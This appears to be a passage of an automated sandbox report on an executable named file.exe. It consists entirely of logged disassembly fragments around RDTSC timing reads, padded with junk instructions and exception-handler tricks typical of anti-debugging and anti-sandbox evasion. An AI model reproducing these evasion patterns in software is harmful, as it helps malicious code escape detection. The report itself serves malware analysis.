Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58BE second address: 3C58C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58C7 second address: 3C58D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58D2 second address: 3C58E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F856102FBE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58E1 second address: 3C58E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C6EA9 second address: 3C6EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C4615 second address: 3C461B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3841AE second address: 3841CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CB094 second address: 3CB098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CB6D9 second address: 3CB6DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769A4 second address: 3769B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007F856106A85Eh 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CB881 second address: 3CB911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F856102FBE6h 0x0000000a popad 0x0000000b jno 00007F856102FBECh 0x00000011 popad 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+122D35BCh] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F856102FBE8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov bx, 67F1h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov dword ptr [ebp+12451F10h], eax 0x0000004b mov eax, dword ptr [ebp+122D01F9h] 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007F856102FBE8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b je 00007F856102FBE6h 0x00000071 push FFFFFFFFh 0x00000073 jmp 00007F856102FBEAh 0x00000078 nop 0x00000079 push esi 0x0000007a push eax 0x0000007b push edx 0x0000007c push ecx 0x0000007d pop ecx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769B9 second address: 3769BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769BF second address: 3769C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769C3 second address: 3769C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFA5B second address: 3CFA9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F856102FBE6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F856102FBE8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov ebx, 34BE0413h 0x00000030 push 00000000h 0x00000032 and edi, 683739B4h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CECA4 second address: 3CECAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFA9F second address: 3CFAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D0CE4 second address: 3D0CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F856106A856h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F856106A856h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D1D9E second address: 3D1DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D2CD2 second address: 3D2CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D3A4E second address: 3D3A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D2CD8 second address: 3D2CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D3A52 second address: 3D3A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D2CDC second address: 3D2D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jno 00007F856106A85Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F856106A85Eh 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F856106A865h 0x00000027 jc 00007F856106A86Bh 0x0000002d call 00007F856106A862h 0x00000032 pushad 0x00000033 popad 0x00000034 pop ebx 0x00000035 mov eax, dword ptr [ebp+122D02CDh] 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F856106A858h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ebp 0x0000005a call 00007F856106A858h 0x0000005f pop ebp 0x00000060 mov dword ptr [esp+04h], ebp 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc ebp 0x0000006d push ebp 0x0000006e ret 0x0000006f pop ebp 0x00000070 ret 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 ja 00007F856106A85Ch 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B0A second address: 3D4B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B17 second address: 3D4B21 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B21 second address: 3D4B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B27 second address: 3D4B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F856106A858h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov ebx, 33EBC76Fh 0x0000002a push 00000000h 0x0000002c mov ebx, 0F8DEF57h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B61 second address: 3D4B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B65 second address: 3D4B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6BEC second address: 3D6BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6BF0 second address: 3D6C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A862h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jne 00007F856106A856h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6C14 second address: 3D6C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6C19 second address: 3D6C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A864h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F856106A85Dh 0x00000012 xor edi, dword ptr [ebp+122D364Ch] 0x00000018 pop edi 0x00000019 mov ebx, dword ptr [ebp+122D3804h] 0x0000001f push 00000000h 0x00000021 or dword ptr [ebp+122D2C6Dh], esi 0x00000027 mov ebx, dword ptr [ebp+122D29FDh] 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 and cx, 12CEh 0x00000035 popad 0x00000036 xchg eax, esi 0x00000037 push ecx 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8D1D second address: 3D8D3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856102FBF9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8D3B second address: 3D8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F856106A865h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F856106A858h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 and di, B1F0h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F856106A858h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, 3EB1A6C9h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1247D8FCh], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8DBA second address: 3D8DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8DC0 second address: 3D8DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6E87 second address: 3D6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6E8C second address: 3D6E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD0CE second address: 3DD13C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D3734h] 0x00000012 jp 00007F856102FBF8h 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b or ch, FFFFFF8Ch 0x0000001e mov dword ptr [ebp+122D1DB7h], edx 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jmp 00007F856102FBF5h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F856102FBEDh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 ja 00007F856102FBE6h 0x0000003c pop eax 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DC434 second address: 3DC43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DC43A second address: 3DC448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD290 second address: 3DD294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD294 second address: 3DD29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3E1D32 second address: 3E1D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6B6 second address: 3EC6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6BA second address: 3EC6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6D8 second address: 3EC6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBF8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6FC second address: 3EC70F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856106A85Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC70F second address: 3EC72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F856102FBF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC977 second address: 3EC97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF27D second address: 3EF282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF282 second address: 3EF28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F856106A856h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF28C second address: 3EF290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3783BE second address: 3783C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3783C8 second address: 3783CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3783CC second address: 3783D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F42E4 second address: 3F4302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 jng 00007F856102FBFDh 0x0000000c jmp 00007F856102FBEFh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F30B8 second address: 3F30C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F856106A856h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F39A2 second address: 3F39A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F3AFC second address: 3F3B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F8A0D second address: 3F8A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 jmp 00007F856102FBECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FE333 second address: 3FE35D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A864h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F856106A860h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FE35D second address: 3FE3A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F856102FBE6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F856102FBF0h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F856102FBE6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e jmp 00007F856102FBF0h 0x00000023 jnc 00007F856102FBE8h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D4AB second address: 37D4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D4AF second address: 37D4BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F856102FBE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCEE5 second address: 3FCF02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Ah 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F856106A858h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCF02 second address: 3FCF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBEDh 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F856102FBF8h 0x00000010 popad 0x00000011 jl 00007F856102FBECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCF36 second address: 3FCF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCF3A second address: 3FCF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F856102FBE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD097 second address: 3FD0AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A856h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F856106A85Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD0AE second address: 3FD0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD0B6 second address: 3FD0DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A85Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F856106A862h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD7D0 second address: 3FD7F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F856102FBE6h 0x00000010 jns 00007F856102FBE6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD7F9 second address: 3FD81D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F856106A856h 0x00000009 jnl 00007F856106A856h 0x0000000f pop esi 0x00000010 ja 00007F856106A858h 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push edi 0x0000001c jo 00007F856106A856h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD81D second address: 3FD828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD828 second address: 3FD82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD82C second address: 3FD830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD982 second address: 3FD988 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD988 second address: 3FD9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F856102FBF0h 0x0000000d jmp 00007F856102FBEBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDC14 second address: 3FDC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDC18 second address: 3FDC33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F856102FBECh 0x0000000c jc 00007F856102FBE6h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDC33 second address: 3FDC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
